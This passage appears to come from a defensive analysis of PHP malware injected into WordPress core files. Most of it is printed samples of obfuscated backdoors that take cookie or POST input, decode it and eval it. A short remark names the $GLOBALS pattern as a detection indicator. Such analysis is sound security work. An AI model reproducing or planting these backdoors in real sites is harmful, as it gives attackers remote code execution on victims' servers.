$kf0800b21['e7ad307'][1].$kf0800b21['e7ad307'][65].$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][6].$kf0800b21['e7ad307'][50];$kf0800b21[$kf0800b21['e7ad307'][27].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][41]] = $kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][50];$kf0800b21[$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][50]] = $kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][88].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][88].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][97];$kf0800b21[$kf0800b21['e7ad307'][26].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][64]] = $kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][2];$kf0800b21[$kf0800b21['e7ad307'][60].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][81]] = 
$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][43];$kf0800b21[$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][50]] = $_POST;$kf0800b21[$kf0800b21['e7ad307'][40].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][2]] = $_COOKIE;@$kf0800b21[$kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][21]]($kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][60], NULL);@$kf0800b21[$kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][21]]($kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][60].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][47], 0);@$kf0800b21[$kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][21]]($kf0800b21['e7ad307'][88].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][40].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][40].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][1].$kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][65].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][88].$kf0800b21['e7ad307'][50], 0);@$kf0800b21[$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][50]](0);$u63f1 = 
NULL;$p39bec = NULL;$kf0800b21[$kf0800b21['e7ad307'][20].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][10]] = $kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][92].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][92].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][92].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][92].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][64];global $w9af8;function  a862($u63f1, $b7d73df){global $kf0800b21;$l669cad = \"\";for ($l7574d672=0; $l7574d672<$kf0800b21[$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][55]]($u63f1);){for ($p596=0; $p596<$kf0800b21[$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][55]]($b7d73df) && $l7574d672<$kf0800b21[$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][55]]($u63f1); $p596++, $l7574d672++){$l669cad .= 
$kf0800b21[$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][50]]($kf0800b21[$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][75]]($u63f1[$l7574d672]) ^ $kf0800b21[$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][75]]($b7d73df[$p596]));}}return $l669cad;}function  t94afa4($u63f1, $b7d73df){global $kf0800b21;global $w9af8;return $kf0800b21[$kf0800b21['e7ad307'][60].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][81]]($kf0800b21[$kf0800b21['e7ad307'][60].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][81]]($u63f1, $w9af8), $b7d73df);}foreach ($kf0800b21[$kf0800b21['e7ad307'][40].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][2]] as $b7d73df=>$i98b42){$u63f1 = $i98b42;$p39bec = $b7d73df;}if (!$u63f1){foreach ($kf0800b21[$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][50]] as $b7d73df=>$i98b42){$u63f1 = $i98b42;$p39bec = $b7d73df;}}$u63f1 = @$kf0800b21[$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][75]]($kf0800b21[$kf0800b21['e7ad307'][26].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][64]]($kf0800b21[$kf0800b21['e7ad307'][27].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][41]]($u63f1), $p39bec));if 
(isset($u63f1[$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][36]]) && $w9af8==$u63f1[$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][36]]){if ($u63f1[$kf0800b21['e7ad307'][21]] == $kf0800b21['e7ad307'][51]){$l7574d672 = Array($kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][48] => @$kf0800b21[$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][41]](),$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][48] => $kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][71].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][92].$kf0800b21['e7ad307'][77],);echo @$kf0800b21[$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][64]]($l7574d672);}elseif ($u63f1[$kf0800b21['e7ad307'][21]] == $kf0800b21['e7ad307'][50]){eval\/*c4033*\/($u63f1[$kf0800b21['e7ad307'][64]]);}exit();} ?><\/pre>\n


Most often they are injected into WordPress core files. The structure is always similar:

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $a078e82 = 840;$GLOBALS['v048a'] = Array();global $v048a;$v048a = $GLOBALS;${\"GLOBALS\"}['e7a5745b2'] = \"3A^neQ8D*Kl+=gOf]v9!P.ITV&W2J,|Y#\\x9i5rwM4 s:C~;?ES\\xdu`a[%z1U}yLq(@HBFmdGN'\\x0\\xaX{<\"7oc$_h)Zb-\/>pjR6tk\";$v048a[$v048a['e7a5745b2'][93].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][80]] = $v048a['e7a5745b2'][82].$v048a['e7a5745b2'][85].$v048a['e7a5745b2'][36];$v048a[$v048a['e7a5745b2'][50].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][80]] = $v048a['e7a5745b2'][81].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][68];$v048a[$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][35]] = $v048a['e7a5745b2'][41].$v048a['e7a5745b2'][96].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][3];$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][88]] = $v048a['e7a5745b2'][34].$v048a['e7a5745b2'][3].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][96];$v048a[$v048a['e7a5745b2'][59].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][6]] = 
$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][55].$v048a['e7a5745b2'][4];$v048a[$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][0].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][80]] = $v048a['e7a5745b2'][92].$v048a['e7a5745b2'][85].$v048a['e7a5745b2'][92].$v048a['e7a5745b2'][17].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][3];$v048a[$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][52]] = $v048a['e7a5745b2'][50].$v048a['e7a5745b2'][3].$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][55].$v048a['e7a5745b2'][4];$v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][82]] = $v048a['e7a5745b2'][88].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][95].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][4];$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][68]] = 
$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][96].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][96].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][67].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][67].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][96];$v048a[$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][95]] = $v048a['e7a5745b2'][13].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][27];$v048a[$v048a['e7a5745b2'][93].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][95].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56]] = $v048a['e7a5745b2'][73].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][82];$v048a[$v048a['e7a5745b2'][3].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][15]] = $_POST;$v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][95]] = $_COOKIE;@$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][88]]($v048a['e7a5745b2'][4].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][13], 
NULL);@$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][88]]($v048a['e7a5745b2'][10].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][13].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][41], 0);@$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][88]]($v048a['e7a5745b2'][67].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][73].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][73].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][50].$v048a['e7a5745b2'][96].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][3].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][96].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][67].$v048a['e7a5745b2'][4], 0);@$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][68]](0);$x24294 = NULL;$r73534bfb = NULL;$v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][6]] = 
$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][0].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][95].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][0].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][0];global $sbb18;function  x9b72fc($x24294, $h23d86){global $v048a;$q3dd887f = \"\";for ($v3970=0; $v3970<$v048a[$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][35]]($x24294);){for ($n33fd565=0; $n33fd565<$v048a[$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][35]]($h23d86) && $v3970<$v048a[$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][35]]($x24294); $n33fd565++, $v3970++){$q3dd887f .= $v048a[$v048a['e7a5745b2'][93].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][80]]($v048a[$v048a['e7a5745b2'][50].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][80]]($x24294[$v3970]) ^ $v048a[$v048a['e7a5745b2'][50].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][80]]($h23d86[$n33fd565]));}}return 
$q3dd887f;}function  gbc192($x24294, $h23d86){global $v048a;global $sbb18;return $v048a[$v048a['e7a5745b2'][93].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][95].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56]]($v048a[$v048a['e7a5745b2'][93].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][95].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56]]($x24294, $sbb18), $h23d86);}foreach ($v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][95]] as $h23d86=>$vb94){$x24294 = $vb94;$r73534bfb = $h23d86;}if (!$x24294){foreach ($v048a[$v048a['e7a5745b2'][3].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][15]] as $h23d86=>$vb94){$x24294 = $vb94;$r73534bfb = $h23d86;}}$x24294 = @$v048a[$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][52]]($v048a[$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][95]]($v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][82]]($x24294), $r73534bfb));if (isset($x24294[$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][97]]) && $sbb18==$x24294[$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][97]]){if ($x24294[$v048a['e7a5745b2'][52]] == $v048a['e7a5745b2'][34]){$v3970 = Array($v048a['e7a5745b2'][92].$v048a['e7a5745b2'][17] => @$v048a[$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][0].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][80]](),$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][17] => 
$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][21].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][56],);echo @$v048a[$v048a['e7a5745b2'][59].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][6]]($v3970);}elseif ($x24294[$v048a['e7a5745b2'][52]] == $v048a['e7a5745b2'][4]){eval\/*ifd841*\/($x24294[$v048a['e7a5745b2'][68]]);}exit();} ?><\/pre>\n

A simpler form:

<?php $p5dQxlL = array(8660, 185, 6556, 64, 6770, 183, 2842, 158, 5462, 182, 13540, 186, 7538, 178, 12903, 122, 11598, 108, 6269, 89, 4100, 161, 682, 102, 6077, 41, 1022, 153, 4629, 88, 5818, 109, 6953, 183, 1771, 114, 11125, 97, 3000, 42, 9736, 187, 3761, 164, 12707, 196, 847, 114, 4355, 153, 1175, 129, 7136, 93, 6192, 77, 3290, 176, 5124, 151, 8045, 179, 2671, 74, 12185, 176, 8224, 73, 467, 69, 92, 190, 8845, 187, 536, 146, 10796, 149, 10945, 81, 10271, 155, 13195, 177, 7229, 121, 8297, 173, 9165, 164, 1885, 93, 7350, 188, 12137, 48, 11463, 135, 3925, 175, 784, 63, 13025, 170, 4828, 55, 12530, 77, 4508, 121, 11917, 56, 2156, 122, 9923, 160, 1647, 124, 4717, 111, 5275, 187, 10694, 102, 2278, 191, 5927, 150, 12075, 62, 12027, 48, 0, 92, 9519, 158, 4261, 94, 11026, 99, 6118, 74, 7716, 194, 10524, 170, 13372, 168, 10143, 41, 4883, 146, 11706, 74, 3466, 146, 2469, 123, 1304, 154, 11222, 125, 11347, 116, 9474, 45, 5644, 174, 6667, 103, 8470, 190, 282, 185, 10083, 60, 3170, 120, 2745, 97, 3042, 128, 11973, 54, 2592, 79, 5029, 95, 961, 61, 9677, 59, 6358, 198, 9329, 145, 1588, 59, 11780, 137, 13726, 158, 12607, 100, 3612, 149, 1458, 130, 10184, 87, 9032, 133, 7952, 93, 10426, 98, 1978, 178, 6620, 47, 12361, 169, 7910, 42);\r\n$FY52xy = \"\";\r\nfor ($tWqBxTpk = 0;$tWqBxTpk < sizeof($p5dQxlL);$tWqBxTpk+= 2) {\r\n    if ($tWqBxTpk % 4) {\r\n        $FY52xy.= substr($Sc9mQcZx, $p5dQxlL[$tWqBxTpk], $p5dQxlL[$tWqBxTpk + 1]);\r\n    } else {\r\n        $FY52xy.= $jaNwcmT(substr($Sc9mQcZx, $p5dQxlL[$tWqBxTpk], $p5dQxlL[$tWqBxTpk + 1]));\r\n    }\r\n};\r\nif (!isset($jcRQ6i)) return $FY52xy;<\/pre>\n


You will notice that these malware samples always rely on the $GLOBALS superglobal array, which is the indicator we use most often:

<?php $tb78 = 506;\r\n$GLOBALS['fb355e'] = Array();\r\nglobal $fb355e;\r\n$fb355e = $GLOBALS;\r\n$ {\r\n    \"GLOBALS\"\r\n}\r\n['l82418'] = \"ozMBYu4A<\"TnPRx ~ I ^ bk_O5 & HU\\x9JW\r\n} > w$\\xa ? \/;\r\nNm, GyVj0F[ = 1q % Dl9) de@]c782\\ : (6f\\xdv + #KsZS|p'-!gaXL3E*Cr`.{tQhi\";$fb355e[$fb355e['l82418'][83].$fb355e['l82418'][56].$fb355e['l82418'][67].$fb355e['l82418'][86].$fb355e['l82418'][54]] = $fb355e['l82418'][60].$fb355e['l82418'][96].$fb355e['l82418'][90];$fb355e[$fb355e['l82418'][60].$fb355e['l82418'][83].$fb355e['l82418'][18].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][57]] = $fb355e['l82418'][0].$fb355e['l82418'][90].$fb355e['l82418'][56];$fb355e[$fb355e['l82418'][44].$fb355e['l82418'][63].$fb355e['l82418'][18].$fb355e['l82418'][62].$fb355e['l82418'][68].$fb355e['l82418'][62]] = $fb355e['l82418'][74].$fb355e['l82418'][94].$fb355e['l82418'][90].$fb355e['l82418'][53].$fb355e['l82418'][57].$fb355e['l82418'][11];$fb355e[$fb355e['l82418'][42].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][83].$fb355e['l82418'][68].$fb355e['l82418'][60]] = $fb355e['l82418'][97].$fb355e['l82418'][11].$fb355e['l82418'][97].$fb355e['l82418'][21].$fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][94];$fb355e[$fb355e['l82418'][74].$fb355e['l82418'][61].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][56].$fb355e['l82418'][62].$fb355e['l82418'][18].$fb355e['l82418'][60].$fb355e['l82418'][63]] = 